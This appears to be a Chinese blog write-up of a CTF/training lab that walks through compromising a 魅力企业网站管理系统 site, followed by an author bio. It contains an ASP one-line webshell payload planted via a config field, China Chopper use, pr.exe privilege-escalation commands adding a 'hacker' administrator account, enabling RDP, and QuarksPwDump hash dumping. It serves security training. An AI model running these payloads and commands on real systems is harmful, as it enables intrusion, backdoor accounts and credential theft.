分类
CTF

ichunqiu-渗透测试入门04-我很简单请不要欺负我

 ## 我很简单,请不要欺负我
 
 ### 工具
 - 御剑(后台扫描)
 - Domain(SQL注入)
 - 穿山甲(pangolin,注入)
 - 中国菜刀(webshell)
 - cmd.exe + pr.exe + 3389.bat (提权)
 - QuarksPwDump.exe(Hash获取)
 
 ### 背景
 - 魅力企业网站管理系统 网站渗透
 
 ### 步骤
 1. 扫描后台登陆页面
     - 使用 御剑 扫描即可得到
 2. 扫描注入点
     + 2.1 
         - 使用Domain3.6.exe扫描即可得到注入点
         - 进行SQL注入猜解检测,获得管理员用户名和密码
      + 2.2
         - 利用穿山甲(Pangolin)对注入链接进行扫描
         - 获取管理员用户名和密码
 3. 登陆后台,添加一句话
     - 在系统管理-网站信息配置中,”公司名称“处,修改为    `"%><%Eval Request(Chr(35))%><%'`,修改成功后,公司名称应为**空**。
 4. 菜刀连接
     - 经过对魅力企业网站管理系统源码查看,发现其网站信息配置页面为`/inc/config.asp`即`http://www.xxx.com/inc/config.asp`,输入`chr(35)`对应的密码(ascii为**#**);添加完毕即可访问。
 5. 添加用户提权,开启3389
     1. 找一个可以写的目录,上传提权文件
         - 上传cmd.exe\pr.exe\3389.exe,直接拖拽到菜刀界面的可写目录中即可。
         >    Pr.exe提权
         >    
             Windows跟踪注册表项的ACL权限提升漏洞  KB952004  MS09-012
             Windows管理规范(WMI)提供程序没有正确地隔离NetworkService或LocalService帐号下运行的进程,同一帐号下运行的两个独立进程可以完全访问对方的文件句柄、注册表项等资源。WMI提供程序主机进程在某些情况下会持有SYSTEM令牌,如果攻击者可以以 NetworkService或LocalService帐号访问计算机,攻击者就可以执行代码探索SYSTEM令牌的WMI提供程序主机进程。一旦找到了SYSTEM令牌,就可以获得SYSTEM权限的提升。
     2. 在菜刀中使用“虚拟终端”方式打开上传的cmd.exe文件
     3. 切换到上传文件的路径,使用pr方式添加用户,提升权限
         `cmd > pr "net user hacker 123 /add"`
         `cmd > pr "net localgroup administrators hacker /add"`
     4. 用户添加成功后,开启3389;一次不成功,多试几次。
         `pr 3389`
 
 6. 登陆远程服务器,获取管理员密码
     1. 登陆到远程服务器中
     2. 利用菜刀上传获取管理hash的工具:QuarksPwDum.exe
     3. 打开远程服务器中的cmd,运行上传的QuarksPwDum.exe;输入`QuarksPwDump --dump-hash-local`
     4. 利用上述命令即可查看到各个用户的Hash;
     5. 打开Hash破解网站,破解Hash即可获得管理员的密码;例如`:https://www.objectif-securite.ch/en/ophcrack.php`。 

shuoed

山东鄄城人士,大学本科读了计算机科学与技术专业,研究生期间读了诉讼法学专业。
计算机领域,算法方面是算是ACM省银水平;编程方面在高校取得过项目比赛的奖励;网络方面考过了计算机等级四级网络工程师;安全方面考过了软考信息安全工程师;学术方面发表了一篇关于密码设置的论文,毕业论文写了X86架构下微内核的设计与实现。
法律领域,学术方面发表了三篇分别关于身份同一认定、不损坏原件原则、跨境取证的论文,写了一篇关于DDoS黑产的硕士论文(投稿中);取证方面参见了三类电子取证比赛,虎鲸杯、中科实数杯、美亚杯等共6次比赛,5次获奖。
目前就职于国内某知名电子取证公司做培训讲师。

发表评论

您的电子邮箱地址不会被公开。 必填项已用*标注